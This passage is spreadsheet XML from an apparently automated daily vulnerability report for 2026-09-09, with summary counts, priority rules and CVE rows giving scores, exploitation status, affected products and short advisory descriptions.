Target="https://osv.dev/vulnerability/MAL-2026-16103" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16104" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16105" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16121" TargetMode="External" Id="rId99" /></Relationships>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6" customWidth="1" min="1" max="1"/>
    <col width="70" customWidth="1" min="2" max="2"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Daily Vulnerability Report</t>
        </is>
      </c>
      <c r="B1" t="inlineStr"/>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>Report date</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-09T00:00 to 2026-09-10T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-17 09:51:28 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1367</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Newly published</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>720</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Updated (recently published, now scored / KEV)</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>647</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV (actively exploited)</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>150</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>491</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>555</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>66</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Unscored (awaiting NVD analysis)</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>115</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>39</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>39</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>85</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr"/>
      <c r="B18" s="3" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>Sources</t>
        </is>
      </c>
      <c r="B19" s="3" t="inlineStr">
        <is>
          <t>NVD 2.0, CISA KEV, FIRST EPSS, CISA Vulnrichment, GitHub Security Advisories, OSV.dev</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Watchlist keywords</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>microsoft:windows_server, microsoft:exchange, microsoft:sql_server, microsoft:sharepoint, oracle:database, oracle:weblogic, oracle:java, openssl, openssh, vmware, citrix, fortinet, paloaltonetworks, cisco, f5:big-ip, ibm:websphere, ibm:db2, ibm:mq, sap, apache:tomcat, apache:http_server, apache:struts, apache:kafka, apache:activemq, nginx, kubernetes, docker, jenkins, gitlab, atlassian, spring, log4j, postgresql, mysql, mongodb, redis, elastic, keycloak, okta, hashicorp, jackson-databind, fasterxml</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr"/>
      <c r="B21" s="3" t="inlineStr"/>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50, or SSVC exploitation = active</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10, or SSVC exploitation = poc</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="3" t="inlineStr">
        <is>
          <t>Everything else, incl. CVEs not yet scored by NVD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3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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R2"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S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8"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S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12"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12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>ConnectWise ScreenConnect contains both an improper privilege management and missing authorization vulnerability that may allow an attacker to transfer and execute files through an active remote session without authorization or host confirmation.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15"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S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="n">
        <v>0.011</v>
